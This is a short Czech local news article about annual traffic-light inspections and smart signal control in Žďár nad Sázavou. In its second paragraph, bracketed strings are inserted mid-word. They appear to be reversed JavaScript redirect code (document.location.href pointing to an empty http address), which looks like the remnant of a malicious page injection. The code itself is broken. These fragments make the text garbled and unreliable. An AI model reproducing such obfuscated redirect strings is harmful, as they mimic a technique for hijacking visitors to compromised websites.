Rainbow page separator

Kontroly semaforů ve žďárských ulicích způsobí drobná omezení

Pondělí, 28. června 2021

Žďár nad Sázavou / Roční prohlídky a zkoušky semaforů se ve žďárských ulicích uskuteční ve středu 30. června a ve čtvrtek 1. července. Řidiči se tak musí připravit na drobná omezení zejména v podobě možného krátkodobého výpadku světelné signalizace. Zkoušky budou probíhat mimo dopravní špičku, přičemž výpadek potrvá nejdéle pět minut.
Takzvané chytré semafory byly v loňském roce instalovány na pěti stěžejních žďárských křižovatkách za účelem dynamického řízení dopravy. To dokáže pomocí kamer a senzorů sledovat intenzitu dopravy v různých směrech a pruzích a na základě [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho rozhodnout, jak dlouho bude trvat zelená pro příslušný směr jízdy. Po zkušebním provozu nových semaforů došlo ještě k různým dílčím úpravám a například také k přenastavení software na křižovatce u obchodního centra Convent. Tamní změny vzešly z dat a pozorování z loňského podzimu, neboť preferováním přímého směru z Brněnské do Horní ulice se situace pro frekven[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovanou Smetanovu ulici poněkud zhoršila.